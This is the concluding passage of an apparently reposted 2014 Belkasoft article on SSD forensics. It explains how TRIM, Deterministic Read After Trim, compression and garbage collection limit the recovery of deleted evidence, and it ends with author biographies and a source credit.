Conclusion SSD forensics remains different. SSDs self-destroy court evidence, making it difficult to extract deleted files and destroyed information (e.g., from formatted disks) is close to impossible. Numerous exceptions still exist, allowing forensic specialists to access destroyed evidence on SSD drives used in certain configurations. There has been little progress in SSD development since the publication of our last article on SSD forensics in 2012. The factor defining the playing field remains delivering bigger size for less money. That aside, compressing SSD controllers appear to become the norm, making off-chip acquisition unpractical and killing all sorts of DIY SSD acquisition hardware. More SSD drives appear to follow the Deterministic Read After Trim (DRAT) approach defined in the SATA standard a long time ago. This in turn means that a quick format is likely to instantly render deleted evidence inaccessible to standard read operations, even if the drive is acquired with a forensic write-blocking imaging hardware immediately after. SSD drives are getting more complex, adding over-provisioning support and using compression for better performance and wear leveling. However, because of the increased complexity, even seasoned manufacturers released SSD drives with buggy firmware, causing improper operation of TRIM and garbage collection functionality. Considering just how complex today’s SSD drives have become, it’s surprising these things do work, even occasionally. The playfield is constantly changing, but what we know now about SSD forensics gives hope. About the authors Yuri Gubanovis a renowned computer forensics expert. He is a frequent speaker at industry-known conferences such as HTCIA, TechnoSecurity, CEIC and others. Yuri is the Founder and CEO of Belkasoft. Besides, Yuri is senior lecturer at St-Petersburg State University. You can add Yuri Gubanov to your LinkedIn network at Yuri Gubanov | LinkedIn Oleg Afonin is an expert and consultant in computer forensics. You can contact the authors via research@belkasoft.com About Belkasoft Research Belkasoft Research is based in St. Petersburg State University. The company performs non-commercial researches and scientific activities Sursa: Recovering Evidence from SSD Drives in 2014: Understanding TRIM, Garbage Collection and Exclusions | Forensic Focus - Articles
×
×
  • Create New...